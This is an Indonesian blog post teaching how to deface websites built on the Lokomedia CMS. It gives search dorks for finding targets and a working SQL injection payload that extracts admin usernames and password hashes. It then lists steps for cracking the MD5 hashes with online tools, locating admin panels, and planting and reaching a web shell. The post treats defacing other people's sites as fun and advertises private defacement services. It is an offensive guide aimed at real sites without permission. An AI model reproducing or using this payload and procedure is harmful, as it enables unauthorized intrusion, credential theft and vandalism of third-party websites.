Bahan :
1. Dork :
inurl:/statis-1-profil.htmlKembangin lagi biar dapet yg VULN + Perawan :p
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html
Dork lengkap tunggu post selanjutnya :*
2. Exploit
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
3. MD5 Decrypter
KHUSUS MD5 DECRYPTER, LU DECRYPT PAKE OTAK LU NDIRI!
Bercanda :v Ada tools online nya kok :p
https://hashkiller.co.uk/md5-decrypter.aspx
http://md5online.org/
Tutorial:
1. Dorking pake dork di atas.
2. Pilih salah satu target. Salah dua juga gapapa :v
3. Masukan injeksi nya.
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+Gatau caranya? :v Sini gw ajarin :p
http://site.co.li/statis-1-profil.html lu tambahin exploit nya sesudah angka. Jadinya gini:
http://site.co.li/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
4. Kalo vuln jadinya bakal kek gini.
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH-ExJB_dzdzfx-Jp4itvMCwQz1jLBFqHxEg71qnYM8YapLNnOQpp2g-j2tU3a21LbTkAxqfakgTMT1tIgnUz1baE8qLNvCaV8HhjPADNkwvII7BPfPjbzNHhmjyp-jLHBcLxYL1Sm2V1m/s640/8a94261d-cac2-41bc-ab81-bb5a101fb00f+%25281%2529.jpg)
5. Tekan Ctrl+U trus copy MD5 nya ke MD5 Decrypter.
6. Tinggal cari admin page nya. Biasanya sih di:
http://target.co.li/admin
http://target.co.li/adminweb
http://target.co.li/administrator
http://target.co.li/redaktur
7. Tanem shell? Use ur brain :) Jangan maunya disuapin mulu!
8. Akses shell? Klik kanan gambar yg ancur. trus 'Open Image In New Tab'.
9. Tinggal akses aja :v wkkwkwkwk
Itu Satu Saja :) Seru Bukan Deface?? Kalo Mau Private Deface Bisa Chat Link Disini
0 Response to "Deface SQL LOKOMEDIA "
Post a Comment
Terimakasih telah membaca artikel di Blog Tegar ID , berikut tata cara berkomentar yang baik dan benar
1. Dilarang menyisipkan link aktif dikomentar blog
2. Dilarang meletakkan URL langsung di komentar blog
3. Berkomentar minimal 5 kata
4. Jangan buang waktu anda untuk nyepam karena tidak akan saya tampilkan komentar anda
5. Komentar sara jangan pake fake akun , kayak pecundang saja
Semoga anda berkenan menaati aturan yang saya buat sekian dan terimakasih